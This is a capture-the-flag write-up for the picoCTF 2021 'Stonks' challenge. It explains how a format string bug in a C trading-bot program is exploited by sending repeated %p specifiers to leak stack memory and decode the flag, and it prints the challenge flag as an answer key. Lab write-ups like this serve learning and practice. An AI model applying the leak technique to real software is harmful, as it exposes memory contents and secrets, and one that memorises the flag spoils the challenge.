PicoCTF-2021 Writeup
  • README
  • Binary Exploitation
    • Binary Gauntlet 0
    • Binary Gauntlet 1
    • Stonks
    • What's your input?
  • Cryptography
    • Compress and Attack
    • Dachshund Attacks
    • Double DES
    • Easy Peasy
    • It is my Birthday 2
    • It's Not My Fault 1
    • Mini RSA
    • New Caesar
    • New Vignere
    • No Padding, No Problem
    • Pixelated
    • Play Nice
    • Scrambled: RSA
  • Forensics
    • Disk, disk, sleuth!
    • Disk, disk, sleuth! II
    • information
    • MacroHard WeakEdge
    • Matryoshka doll
    • Milkslap
    • Surfing the Waves
    • Trivial Flag Transfer Protocol
    • tunn3l v1s10n
    • Very very very Hidden
    • Weird File
    • Wireshark doo dooo do doo...
    • Wireshark twoo twooo two twoo...
  • Reverse Engineering
    • ARMssembly 0
    • ARMssembly 2
    • ARMssembly 3
    • ARMssembly 4
    • gogo
    • Hurry up! Wait!
    • keygenme-py
    • Let's get dynamic
    • Rolling My Own
    • Shop
    • speeds and feeds
    • Transformation
  • Web Exploitation
    • Ancient History
    • Bithug
    • GET aHEAD
    • It is my Birthday
    • More Cookies
    • Most Cookies
    • Scavenger Hunt
    • Some Assembly Required 1
    • Some Assembly Required 2
    • Some Assembly Required 3
    • Some Assembly Required 4
    • Super Serial
    • Web Gauntlet 2
    • Web Gauntlet 3
    • Who are you?
    • X marks the spot
Powered by GitBook
On this page
  • Problem
  • Solution
  • Flag

Was this helpful?

Edit on GitHub
  1. Binary Exploitation

Stonks

PreviousBinary Gauntlet 1NextWhat's your input?

Last updated 2 years ago

Was this helpful?

Problem

I decided to try something noone else has before. I made a bot to automatically trade stonks for me using AI and machine learning. I wouldn't believe you if you told me it's unsecure! vuln.c nc mercury.picoctf.net 16439

Solution

  1. We can compile the c source code using gcc -g -m32 vuln.c -o vuln and then we can generate a pwntools template using pwn template --host mercury.picoctf.net --port 16439 vuln.

  2. This is a standard format string vulnerability. It even tells us that the program is vulnerable to a format string attack when we compile it.

  3. Resources to learn about format string attacks: / / / /

  4. However, my solution is based on .

  5. Essentially, the works by sending a string of repeating %p to the format string function in the program. The program replaces these %ps with values from the stack. Eventually, we work our way up the stack far enough to get to the api_buf and print that out in little endian hexadecimal. We can not use the looping '%{}$s'.format(i) trick from because the program is in little endian adn thus the flag would not be displayed correctly.

  6. Once we dump the stack, we convert the hexadecimal into ascii by converting it to a byte array, reversing the array, and then filtering out bad ascii characters. Then, we simply print the flag.

Flag

picoCTF{I_l05t_4ll_my_m0n3y_c7cb6cae}

Program
Source
Syracuse University Lecture Notes
OWASP
LiveOverflow on YouTube
John Hammond PicoCTF 2017 'I've Got a Secret' on YouTube
PicoCTF 2018 'echooo' Writeup
this writeup
solution script
this PicoCTF 2018 'echooo' Writeup